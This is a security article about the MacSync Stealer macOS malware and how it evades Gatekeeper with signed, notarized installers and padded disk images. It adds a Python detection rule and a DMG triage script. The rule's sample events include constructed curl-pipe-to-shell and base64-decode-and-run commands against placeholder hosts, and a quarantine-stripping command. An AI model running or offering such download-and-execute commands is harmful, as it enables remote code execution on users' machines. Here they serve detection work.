The Mac ecosystem faces an increasingly sophisticated threat: MacSync Stealer, an information-stealing malware that has learned to disguise itself as a legitimate, Apple-approved application. Unlike the clumsy, obvious malware of the past, it installs quietly and abuses macOS's own trust mechanisms (code signing and notarization) rather than any software vulnerability in order to pass unnoticed.
In its most recent variants, MacSync Stealer has shipped with a valid Developer ID signature and an official Apple notarization ticket, which lets it run without Gatekeeper objecting and without matching any existing XProtect signature. This evolution complicates early detection and opens the door to leaks of sensitive data on home computers and in professional environments, in Spain and across Europe.
What is MacSync Stealer and why is it a concern in the macOS ecosystem?
MacSync Stealer is an "infostealer" Trojan built for macOS. Its main objective is to collect and exfiltrate data from the infected computer: personal information, credentials, browsing history and other data of value to the attackers, which is then used for fraud, unauthorized access or sale on underground markets.
In its first appearances the malware was distributed with tactics such as the drag-to-Terminal technique or ClickFix-style lures, in which the deceived user copies and pastes malicious commands into a terminal. That approach required manual interaction and therefore gave the victim more opportunities to become suspicious and abort the installation.
The situation changed with the latest variant identified by Jamf Threat Labs, a lab specializing in Apple device security. Their analysis shows that MacSync Stealer has taken a qualitative leap, adopting a much quieter and more automated approach that minimizes user intervention and exploits the trust placed in the Apple brand.
The researchers explain that the malicious installer presents itself as an application written in Swift, Apple's own programming language, carrying a valid Developer ID code signature and notarized by Apple itself. In practice this means that, as far as macOS is concerned, the software looks completely trustworthy.
A Swift installer that passes Gatekeeper and poses as a messaging service
The new MacSync Stealer campaign relies on an installer posing as a messaging or productivity app, a common cover that lowers the average user's guard. In one of the cases analyzed, the file was distributed as a DMG disk image named "zk-call-messenger-installer-3.9.2-lts.dmg", hosted on a domain dedicated to the supposed service.
Being signed and notarized, the installer runs without Gatekeeper blocking it. Even so, instruction screens have been observed telling the user to right-click the app and choose "Open", the classic trick for getting past the extra warnings macOS shows when it cannot vouch for an app's origin. That the campaign still relies on such prompts is worrying, despite the continuous improvements to macOS's protections.
The main component is a dropper written in Swift: a container whose job is to prepare the ground and fetch the actual malicious payload. Before doing so it runs a series of environment checks, such as verifying internet connectivity and confirming that a minimum execution time of around 3600 seconds (one hour) has been met, according to the analysis, a check whose practical effect is to outlast short-lived automated analysis, and it strips the quarantine attribute from the files involved.
Jamf's experts also highlight specific changes in how the payload is downloaded. The dropper uses curl with less common flag combinations, for example splitting the usual -fsSL sequence into -fL and -sS and adding options such as --noproxy, together with dynamically built variables. These adjustments point to a deliberate attempt to improve download reliability and to evade detection patterns that match on the literal, well-known command line.
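The flag-splitting trick above defeats any rule that looks for the literal string "-fsSL". The following is an added example written for this page (not Jamf's detection content and not the dropper's code) showing how a process-telemetry rule should handle it: the curl argv is normalised into a canonical option set, so "-fsSL", "-fL -sS" and the long-form equivalents all match the same rule, and the remaining traits the article mentions (--noproxy, a URL held in a shell variable, output piped into base64 and a shell, removal of the quarantine attribute) are scored alongside it. The command lines in SAMPLE_EVENTS are constructed, not real telemetry, and the list of value-taking curl options is a partial one chosen for the example.

```python
"""Process-telemetry rule for the curl download pattern described above.

Constructed example added to this page; it is neither Jamf's detection content
nor the dropper's code, and the command lines below are made up. The point it
demonstrates: a rule that matches the literal string "-fsSL" is blind to
"-fL -sS", so the rule has to work on a normalised option set instead.
"""
import shlex
from typing import List, Set, Tuple

# curl short options that consume a value (the rest of the cluster, or the
# next argv element). Partial list (assumption), enough for common invocations.
CURL_SHORT_WITH_VALUE = set("oHdXuAebcTxwKmFECrDyYzQPtU")
SHORT_CANON = {"f": "fail", "s": "silent", "S": "show-error", "L": "location",
               "o": "output", "k": "insecure"}
LONG_CANON = {"--fail": "fail", "--silent": "silent", "--show-error": "show-error",
              "--location": "location", "--output": "output",
              "--noproxy": "noproxy", "--insecure": "insecure"}
LONG_WITH_VALUE = {"--noproxy", "--output", "--proxy", "--header", "--data",
                   "--user-agent", "--referer"}


def normalize_curl(argv: List[str]) -> Tuple[Set[str], List[str]]:
    """Expand clustered/aliased curl flags into canonical names plus URLs.

    `-fsSL`, `-fL -sS` and `--fail --silent --show-error --location` all
    yield the same set, which is what the rule compares against.
    """
    opts: Set[str] = set()
    urls: List[str] = []
    i = 1
    while i < len(argv):
        arg = argv[i]
        if arg.startswith("--"):
            name, _, inline_value = arg.partition("=")
            opts.add(LONG_CANON.get(name, name[2:]))
            if name in LONG_WITH_VALUE and not inline_value:
                i += 1                      # value is the next element
        elif arg.startswith("-") and len(arg) > 1:
            cluster = arg[1:]
            for pos, ch in enumerate(cluster):
                opts.add(SHORT_CANON.get(ch, ch))
                if ch in CURL_SHORT_WITH_VALUE:
                    if pos == len(cluster) - 1:
                        i += 1              # `-o file`: value is next element
                    break                   # `-ofile`: rest of cluster is value
        else:
            urls.append(arg)
        i += 1
    return opts, urls


def analyze_command(cmdline: str) -> List[str]:
    """Return the suspicious traits of one shell command line (pipes allowed).

    Splitting on '|' is deliberately naive (it ignores quoting and '||');
    good enough for telemetry triage, not for a shell parser.
    """
    findings: List[str] = []
    segments = [s for s in (p.strip() for p in cmdline.split("|")) if s]
    for idx, segment in enumerate(segments):
        argv = shlex.split(segment)
        if not argv:
            continue
        prog = argv[0].rsplit("/", 1)[-1]
        last = idx == len(segments) - 1
        if prog == "curl":
            opts, urls = normalize_curl(argv)
            if {"fail", "silent", "location"} <= opts:
                findings.append("curl quiet fetch (fail+silent+location, however clustered)")
            if "noproxy" in opts:
                findings.append("curl --noproxy (skips the proxy where traffic is inspected)")
            if any(u.startswith("$") for u in urls):
                findings.append("curl URL comes from a shell variable")
            if not last:
                findings.append("curl output piped onward")
        elif prog == "base64" and any(a in ("-d", "-D", "--decode") for a in argv[1:]):
            findings.append("base64 decode in pipeline")
        elif prog in ("sh", "bash", "zsh") and idx > 0:
            findings.append(f"{prog} executes piped stdin")
        elif prog == "xattr" and "-d" in argv and "com.apple.quarantine" in argv:
            findings.append("quarantine attribute removed")
    return findings


# Constructed command lines (not real telemetry), in the form an EDR or an
# Endpoint Security client would record them.
SAMPLE_EVENTS = [
    "curl -fsSL https://example.invalid/s.sh | bash",
    "curl -fL -sS --noproxy '*' \"$PAYLOAD_URL\" | base64 -d | /bin/zsh",
    "curl -sS -fL --noproxy \"*\" https://cdn.example.invalid/u.b64 -o /tmp/.u",
    "xattr -d com.apple.quarantine /Volumes/Installer/Installer.app",
    "curl -I https://www.apple.com/",
]


def triage(events: List[str], min_findings: int = 1) -> List[Tuple[str, List[str]]]:
    """Events with at least `min_findings` suspicious traits, in input order."""
    hits = []
    for cmd in events:
        found = analyze_command(cmd)
        if len(found) >= min_findings:
            hits.append((cmd, found))
    return hits


if __name__ == "__main__":
    for cmd, found in triage(SAMPLE_EVENTS):
        print(cmd)
        for item in found:
            print("   -", item)
```

Running the block prints four of the five constructed events; the plain `curl -I` against apple.com produces no findings. In a real deployment the scoring would be tuned (a `curl | bash` is also how some legitimate installers work), but the normalisation step is what makes the rule survive the cosmetic flag reshuffling described above.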
Inflated DMG images and decoy files to mislead security systems
Another striking feature of this campaign is the use of oversized disk images: the DMG reaches approximately 25.5 MB, unusually large for a relatively simple app. According to Jamf Threat Labs' analysis, that size is reached by padding the package with PDFs and other irrelevant documents.
This padding has no use for the user, but it does complicate automated analysis by antivirus and inspection tools. By mixing decoy files with the malicious content and inflating the size, the aim is to make suspicious patterns harder to spot and to slow down review; some scanners also skip or only partially inspect files above a size threshold.
Once the DMG is mounted and the application launched, the dropper runs its pre-flight checks, including network connectivity. If the environment looks as expected, it connects to a remote server controlled by the attackers and downloads a Base64-encoded payload containing the malware's core. Earlier cases of several Trojans reaching macOS put this risk in context.
Once decoded, that code is MacSync, an evolution of a threat known as Mac.c that was first identified in April 2025. Research from teams such as Moonlock Lab (MacPaw) indicates that this family includes a full agent written in Go, capable of far more than simply stealing passwords.
From "stealer" to backdoor: MacSync capabilities
The core component of MacSync is not limited to extracting information. According to public analyses, the threat integrates command-and-control (C2) functions that let the attackers maintain a persistent connection to the compromised machine. Threats with similar remote-control capabilities have been documented on macOS on several occasions.
The capabilities attributed to this type of agent include remote command execution, exfiltration of various file types, access to browsing data and stored credentials, and potentially the on-demand installation of new malicious modules. In other words, the affected computer can become one more node in an infrastructure controlled by cybercriminals.
The move from a simple stealer to a modular remote-control platform is a significant increase in risk for individuals and businesses alike. An infected Mac is no longer merely a source of stolen passwords; it becomes an entry point into corporate networks, cloud services or connected critical systems.
In this context, specialists stress that macOS has become more attractive to attackers. Growing adoption of Macs in European offices, government buildings and homes has dispelled the old myth that "there are no viruses on Macs" and pushed criminals to develop more sophisticated tools for this user base.
Apple's response and general trend of malware for macOS
After being alerted by security researchers, Apple revoked the code-signing certificates linked to the MacSync Stealer campaign. In principle this stops the already-signed applications from running unimpeded and blocks new builds associated with that Developer ID, with the caveat that revocation only takes effect on a Mac that can reach Apple's revocation services when the app is assessed. Apple has taken similar measures against earlier threats, as documented when it acted against Silver Sparrow.
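The points above (a notarized installer that Gatekeeper accepts, the stripped quarantine attribute, the document-padded DMG, and a certificate that has since been revoked) are all things an analyst can check on a suspect image before anyone double-clicks it. The script below is an added example written for this page, not Jamf's tooling; it mounts the image read-only, prints the signing identity, asks Gatekeeper for its verdict (where a revoked Developer ID or a missing notarization shows up as "rejected"), checks for a stapled ticket, and counts document filler inside the bundle. The DMG path and the extension list used to count filler are assumptions; the triage itself only runs on macOS, while the two parsing helpers are plain POSIX sh.

```shell
#!/bin/sh
# Triage of a downloaded installer DMG on macOS. Constructed example added to
# this page, not Jamf's tooling. Reports: (1) whether the quarantine xattr is
# still present, (2) what codesign says about the signature, (3) Gatekeeper's
# verdict via spctl, which is where a revoked certificate or a missing
# notarization shows up, (4) whether a notarization ticket is stapled, and
# (5) how much of the bundle is document filler. Requires macOS for the
# triage; the helpers below are portable POSIX sh.

# Classify the output of `spctl --assess --type execute -vv <app>`.
# Prints one of: accepted:notarized | accepted:signed | rejected | unknown
classify_assessment() {
    out=$1
    case $out in
        *": accepted"*)
            case $out in
                *"source=Notarized Developer ID"*) echo "accepted:notarized" ;;
                *) echo "accepted:signed" ;;
            esac ;;
        *": rejected"*) echo "rejected" ;;
        *) echo "unknown" ;;
    esac
}

# Count filler documents inside a bundle (the "inflated DMG" trick).
# Extension list is an assumption; icons and plists are deliberately excluded.
count_decoys() {
    find "$1" -type f \( -iname '*.pdf' -o -iname '*.doc' -o -iname '*.docx' \
        -o -iname '*.rtf' \) | wc -l | tr -d ' '
}

# Full triage of one DMG; macOS only.
triage_dmg() {
    dmg=$1
    mnt=$(mktemp -d /tmp/triage.XXXXXX)
    printf 'quarantine xattr on DMG: '
    xattr -p com.apple.quarantine "$dmg" 2>/dev/null || echo "(absent)"
    hdiutil attach -nobrowse -readonly -noverify -mountpoint "$mnt" "$dmg" >/dev/null
    for app in "$mnt"/*.app; do
        [ -d "$app" ] || continue
        echo "== $app"
        codesign -dv --verbose=4 "$app" 2>&1 | grep -E '^(Identifier|TeamIdentifier|Authority)='
        codesign --verify --deep --strict "$app" 2>&1 \
            || echo "codesign verify FAILED (revoked certificate or tampered bundle)"
        verdict=$(classify_assessment "$(spctl --assess --type execute -vv "$app" 2>&1)")
        echo "gatekeeper: $verdict"
        if command -v xcrun >/dev/null && xcrun stapler validate "$app" >/dev/null 2>&1; then
            echo "stapled notarization ticket: present"
        else
            echo "stapled notarization ticket: missing (Gatekeeper must look it up online)"
        fi
        echo "size: $(du -sh "$app" | cut -f1), filler documents: $(count_decoys "$app")"
    done
    hdiutil detach "$mnt" >/dev/null
}

# Usage: sh triage.sh /path/to/installer.dmg   (macOS only)
if [ "$(uname)" = "Darwin" ] && [ -n "$1" ]; then
    triage_dmg "$1"
fi
```

A verdict of "rejected" on a bundle whose codesign output still lists a Developer ID authority is exactly what a post-revocation MacSync installer looks like; an "accepted:notarized" verdict on an app that ships with dozens of PDFs and no obvious reason for them is the pre-revocation picture the article describes, and is a reason to look harder rather than to trust the ticket.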
However, both Jamf Threat Labs and other experts warn that the MacSync Stealer case reflects a broader trend in the macOS malware landscape: more and more actors are placing their code inside signed and notarized executables that look like legitimate software, which greatly reduces the likelihood of the user seeing a clear danger warning. It is therefore advisable to complement the built-in defenses with additional tools such as macOS protection solutions.
This mode of operation also relies on social engineering. The mere fact that an application passes Apple's initial checks and appears with the icon of a popular tool or a supposed official service creates a sense of safety that many users never question, especially in environments where macOS is traditionally perceived as a "secure platform".
Similar techniques, such as DMGs branded to mimic Google Meet, have also been used to distribute other macOS stealers such as Odyssey. At the same time, some groups keep using unsigned disk images in campaigns involving threats like DigitStealer, showing that classic methods and more refined strategies coexist within the same criminal ecosystem.
For users and businesses in Spain and across Europe, this means that blind trust in Apple's validation mechanisms is no longer enough. Certificate revocation and the constant improvements to macOS are important steps, but the speed at which new variants appear demands continuous vigilance.
What happened with MacSync Stealer makes clear that Mac malware is no longer anecdotal but a serious problem: attackers abuse Apple's own trust structures, hide their code in signed and notarized applications, use disk images padded with decoy files, and deploy capable agents with data-theft and remote-control functions, a combination that makes it necessary to take macOS security seriously, both at home and at work.